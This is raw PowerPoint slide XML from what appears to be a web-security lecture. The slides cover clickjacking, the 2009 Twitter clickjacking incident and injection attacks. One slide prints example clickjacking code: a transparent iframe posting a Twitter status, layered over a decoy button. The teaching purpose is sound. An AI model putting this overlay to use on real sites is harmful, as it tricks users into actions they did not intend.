              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> clicked. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The idea is simple: An iframe is positioned above what looks like a clickable button on a website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This iframe is invisible to the user (opacity:0) and so the user unknowingly clicks on the iframe which may contain anything! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This can be achieved through CSS alone, no JavaScript is required. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A variation of this technique involves the use of JavaScript to move the iframe around the screen inline with the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>s cursor, therefore achieving the same thing but without having to convince the user to click on a button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The original concern was related to Flash and how a user could unknowingly enable their webcam and microphone so the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> would have access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Clickjacking is hard to combat. From a technical standpoint, the attack is executed using a combination of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>iFrames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, which are both harmless web technologies, and relies mostly on tricking users by means of social engineering. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See Wikipedia on clickjacking, https://en.wikipedia.org/wiki/Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="700" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Clickjacking Example</a:t>
            </a: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14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21526F3-D363-4835-BA9E-FF8DE20339AF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61444" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4041775" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Twitter Hijack via Clickjacking (Feb 2009)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Hundreds and thousands of messages saying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Don</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t Click: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tinyurl.com/amgzs6</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started showing up. Clicking the link shows a simple page with 1 button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Clicking the button uses clickjacking to repost the message to your own twitter account (if you are logged in).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61445" name="Picture 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029200" y="1295400"/>
            <a:ext cx="1743075" cy="1228725"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6144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362200"/>
            <a:ext cx="28194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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Example code for Clickjacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> http://beerpla.net/2009/02/12/how-to-fight-clickjacking-using-the-recent-twitter-hijacking-as-an-example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7885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24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5987245-4AFB-46ED-89EF-28E0F1153F7F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="Content Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4041775" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;style&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>iframe { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	width: 550px; height: 228px; /* Use absolute positioning to line up update button with fake button */ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	position: absolute; top: -170px; left: -418px; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	z-index: 2; /* Hide from view */ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>moz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>-opacity: 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	opacity: 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	filter: alpha(opacity=0); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>button { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	position: absolute; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	top: 10px; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	left: 10px; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	z-index: 1; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	width: 120px; } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;/style&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>="http://twitter.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>home?status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=Test!! (WHAT!!??)" scrolling="no"&gt;&lt;/iframe&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;button&gt;CLICK HERE!&lt;/button&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62469"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t="18767" r="79585" b="75200"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2057400"/>
            <a:ext cx="2286000" cy="6858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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79877" name="Footer Placeholder 4"/>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34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74DF71E-47CF-4ECF-B834-FBC3E5ACFFC2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A general comment on Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8397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45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6F4765-5D64-4299-88D5-177030C566FE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Injection Attacks occurs when an application does not properly validate user supplied input and then includes that input blindly in further processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQL/LDAP/XPATH/SOAP/JSON Injection are all types of Injection Attacks that are enabled by improper input validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>When an attacker is able to craft a malicious input, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This can cause serious security problems where the permissions grant the rights to add, query, modify or remove anything.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3"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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8499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55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3743DF6-056E-4F4B-AA18-340928462AED}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
